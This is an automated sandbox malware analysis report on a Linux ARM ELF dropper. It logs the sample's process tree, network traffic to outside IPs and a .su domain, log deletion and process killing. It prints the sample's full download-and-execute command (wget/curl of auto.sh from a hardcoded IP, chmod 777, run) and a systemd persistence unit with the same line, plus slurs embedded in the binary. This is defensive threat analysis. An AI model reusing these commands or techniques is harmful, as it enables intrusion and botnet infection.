Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.elf

Overview

General Information

Sample name:arm.elf
Analysis ID:1585020
MD5:e4c06f131d9c9081859ab1071b6fa221
SHA1:b08a82702d62782a9d64b8b5607300ac513c6992
SHA256:bde1f436368a6eb6cc655643b4a463d4e83e064db00ce12a48d9d3ee6a2ffc99
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Manipulation of devices in /dev
Sample deletes itself
Sends malformed DNS queries
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1585020
Start date and time:2025-01-07 00:48:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/4@54/0

Warnings

  • VT rate limit hit for: arm.elf

Runtime Messages

Command:/tmp/arm.elf
PID:5822
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:

Process Tree

  • system is lnxubuntu20
  • arm.elf (PID: 5822, Parent: 5749, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.elf
    • arm.elf New Fork (PID: 5825, Parent: 5822)
      • arm.elf New Fork (PID: 5827, Parent: 5825)
        • arm.elf New Fork (PID: 6005, Parent: 5827)
        • arm.elf New Fork (PID: 6007, Parent: 5827)
        • arm.elf New Fork (PID: 6013, Parent: 5827)
        • arm.elf New Fork (PID: 6021, Parent: 5827)
        • arm.elf New Fork (PID: 6023, Parent: 5827)
        • arm.elf New Fork (PID: 6029, Parent: 5827)
        • arm.elf New Fork (PID: 6037, Parent: 5827)
        • arm.elf New Fork (PID: 6039, Parent: 5827)
        • arm.elf New Fork (PID: 6084, Parent: 5827)
        • arm.elf New Fork (PID: 6086, Parent: 5827)
        • arm.elf New Fork (PID: 6114, Parent: 5827)
        • arm.elf New Fork (PID: 6115, Parent: 5827)
        • arm.elf New Fork (PID: 6126, Parent: 5827)
        • arm.elf New Fork (PID: 6128, Parent: 5827)
        • arm.elf New Fork (PID: 6137, Parent: 5827)
        • arm.elf New Fork (PID: 6140, Parent: 5827)
        • arm.elf New Fork (PID: 6169, Parent: 5827)
        • arm.elf New Fork (PID: 6171, Parent: 5827)
        • arm.elf New Fork (PID: 6181, Parent: 5827)
        • arm.elf New Fork (PID: 6183, Parent: 5827)
        • arm.elf New Fork (PID: 6188, Parent: 5827)
        • arm.elf New Fork (PID: 6199, Parent: 5827)
        • arm.elf New Fork (PID: 6201, Parent: 5827)
        • arm.elf New Fork (PID: 6207, Parent: 5827)
        • arm.elf New Fork (PID: 6212, Parent: 5827)
        • arm.elf New Fork (PID: 6221, Parent: 5827)
        • arm.elf New Fork (PID: 6223, Parent: 5827)
        • arm.elf New Fork (PID: 6231, Parent: 5827)
        • arm.elf New Fork (PID: 6234, Parent: 5827)
        • arm.elf New Fork (PID: 6242, Parent: 5827)
        • arm.elf New Fork (PID: 6247, Parent: 5827)
        • arm.elf New Fork (PID: 6256, Parent: 5827)
        • arm.elf New Fork (PID: 6258, Parent: 5827)
        • arm.elf New Fork (PID: 6262, Parent: 5827)
        • arm.elf New Fork (PID: 6265, Parent: 5827)
        • arm.elf New Fork (PID: 6276, Parent: 5827)
        • arm.elf New Fork (PID: 6279, Parent: 5827)
        • arm.elf New Fork (PID: 6282, Parent: 5827)
        • arm.elf New Fork (PID: 6293, Parent: 5827)
        • arm.elf New Fork (PID: 6295, Parent: 5827)
        • arm.elf New Fork (PID: 6303, Parent: 5827)
        • arm.elf New Fork (PID: 6306, Parent: 5827)
        • arm.elf New Fork (PID: 6308, Parent: 5827)
        • arm.elf New Fork (PID: 6312, Parent: 5827)
        • arm.elf New Fork (PID: 6315, Parent: 5827)
        • arm.elf New Fork (PID: 6329, Parent: 5827)
        • arm.elf New Fork (PID: 6334, Parent: 5827)
      • arm.elf New Fork (PID: 5829, Parent: 5825)
        • arm.elf New Fork (PID: 5833, Parent: 5829)
      • arm.elf New Fork (PID: 5831, Parent: 5825)
      • sh (PID: 5831, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 5835, Parent: 5831)
        • systemctl (PID: 5835, Parent: 5831, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • arm.elf New Fork (PID: 5839, Parent: 5825)
      • sh (PID: 5839, Parent: 5825, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 5841, Parent: 5839)
        • systemctl (PID: 5841, Parent: 5839, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 5837, Parent: 5836)
  • snapd-env-generator (PID: 5837, Parent: 5836, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5843, Parent: 5842)
  • snapd-env-generator (PID: 5843, Parent: 5842, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 5865, Parent: 1498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 5865, Parent: 1498, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • systemd New Fork (PID: 5870, Parent: 1)
  • systemd-hostnamed (PID: 5870, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • gdm3 New Fork (PID: 6003, Parent: 1333)
  • Default (PID: 6003, Parent: 1333, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6004, Parent: 1333)
  • Default (PID: 6004, Parent: 1333, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6045, Parent: 1)
  • systemd-user-runtime-dir (PID: 6045, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: arm.elfAvira: detected
Multi AV Scanner detection for submitted file
Source: arm.elfReversingLabs: Detection: 55%
Source: arm.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: arm.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Networking

barindex
Sends malformed DNS queries
Source: global trafficDNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]
Source: global trafficTCP traffic: 192.168.2.15:38196 -> 23.94.242.130:2601
Source: global trafficTCP traffic: 192.168.2.15:44026 -> 107.175.130.16:7722
Source: /tmp/arm.elf (PID: 5822)Socket: 127.0.0.1:39123Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su|1
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suo. [malformed]
Source: startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh
Source: arm.elf, startup_command.service.13.drString found in binary or memory: http://154.216.20.138/auto.sh;
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 724, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 917, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 931, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 933, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 1617, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 1679, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 3052, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 5829)SIGKILL sent: pid: 5865, result: successfulJump to behavior
Source: classification engineClassification label: mal72.troj.evad.linELF@0/4@54/0

Data Obfuscation

barindex
Manipulation of devices in /dev
Source: /tmp/arm.elf (PID: 5827)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5865)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5865)Directory: <invalid fd (8)>/..Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5870)Directory: <invalid fd (10)>/..Jump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/4048/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/4048/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/4048/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/4048/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/4048/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/4048/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5829)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 5831)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/arm.elf (PID: 5839)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /bin/sh (PID: 5835)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5841)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Deletes system log files
Source: /tmp/arm.elf (PID: 5827)Log files deleted: /var/log/kern.logJump to behavior
Sample deletes itself
Source: /tmp/arm.elf (PID: 5822)File: /tmp/arm.elfJump to behavior
Source: /tmp/arm.elf (PID: 5822)Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5870)Queries kernel information via 'uname': Jump to behavior
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: V/arm/var/lib/vmware/VGAuthP0/var/lib/vmware/VGAuth/aliasStoreQ
Source: arm.elf, 6276.1.00007f645c045000.00007f645c251000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: arm.elf, 6276.1.00007f645c034000.00007f645c045000.rw-.sdmpBinary or memory string: /tmp/vmware-root_724-2965906890
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: P /var/lib/vmwareQ
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: V/arm/ro10!/proc/5808/cmdline!/proc/306/cmdline1/var/lib/snapd/environment0!/proc/5773/cmdline!/proc/307/cmdline1/var/lib/php/modules/7.4/cli0!/proc/5668/cmdline!/proc/308/cmdline1/var/lib/php/modules/7.4/registry!/proc/4048/cmdline!/proc/309/cmdline1/tmp/hsperfdata_rootro10!/proc/3803/cmdline!/proc/310/cmdline1/var/lib/python/arm/ro10!/proc/3802/cmdline!/proc/311/cmdline1/var/lib/snapd/libm/ro10!/proc/3801/cmdline!/proc/312/cmdline1/var/lib/unattended-upgrades0!/proc/3800/cmdline!/proc/313/cmdline1/var/lib/snapd/inhibito10!/proc/3725/cmdline!/proc/314/cmdline1/var/lib/emacsen-common/state/package!/proc/3488/cmdline!/proc/315/cmdline1/tmp/ssh-oCVxfzsbTQaTro10!/proc/3483/cmdline!/proc/316/cmdline1/var/lib/emacsen-common/state/flavor!/proc/3475/cmdline!/proc/317/cmdline1/var/lib/snapd/snapsro10!/proc/3469/cmdline!/proc/318/cmdline1/var/lib/emacsen-common10!/proc/3465/cmdline!/proc/319/cmdline1/var/lib/snapd/dbus-1/services0!/proc/3461/cmdline!/proc/320/cmdline1/var/lib/aspell/arm/ro10!/proc/3456/cmdline!/proc/321/cmdline1/var/lib/snapd/ssl/store-certs0!/proc/3440/cmdline!/proc/322/cmdline1/var/lib/bluetoothm/ro10!/proc/3419/cmdline!/proc/323/cmdline1/var/lib/snapd/features10!/proc/3407/cmdline!/proc/324/cmdline1/var/lib/apt/lists/partial0!/proc/3399/cmdline!/proc/325/cmdline1/var/lib/aptV/arm/ro10!/proc/3394/cmdline!/proc/326/cmdline1/tmp/snap-private-tmpro10!/proc/3379/cmdline!/proc/327/cmdline1/var/lib/snapd/lib/glro10!/proc/3368/cmdline!/proc/328/cmdline1/tmp/snap-private-tmp/snap.lxd/tmp!/proc/3332/cmdline!/proc/329/cmdline1/tmp/vmware-root_724-29659068900!/proc/3316/cmdline!/proc/333/cmdline1/tmp/snap.lxd/arm/ro10!/proc/3310/cmdline!/proc/347/cmdline1/var/lib/php/modulesro10!/proc/3303/cmdline!/proc/378/cmdline1/tmp/snap.lxd/tmprm/ro10!/proc/3298/cmdline!/proc/418/cmdline1/var/lib/snapd/seccompo10!/proc/3292/cmdline!/proc/419/cmdline1/var/log/unattended-upgrades0!/proc/3278/cmdline!/proc/490/cmdline1/var
Source: arm.elf, 6276.1.00007f645c045000.00007f645c251000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6276.1.00007f645c045000.00007f645c251000.rw-.sdmpBinary or memory string: /var/lib/boltd8/var/lib/vmwareT
Source: arm.elf, 5822.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.CjSZ5o:
Source: arm.elf, 6276.1.00005618be34f000.00005618be49e000.rw-.sdmpBinary or memory string: P /var/lib/vmware/VGAuthQ
Source: arm.elf, 6276.1.00007f645c045000.00007f645c251000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 5822.1.00007ffec9cb8000.00007ffec9cd9000.rw-.sdmpBinary or memory string: /tmp/qemu-open.CjSZ5o
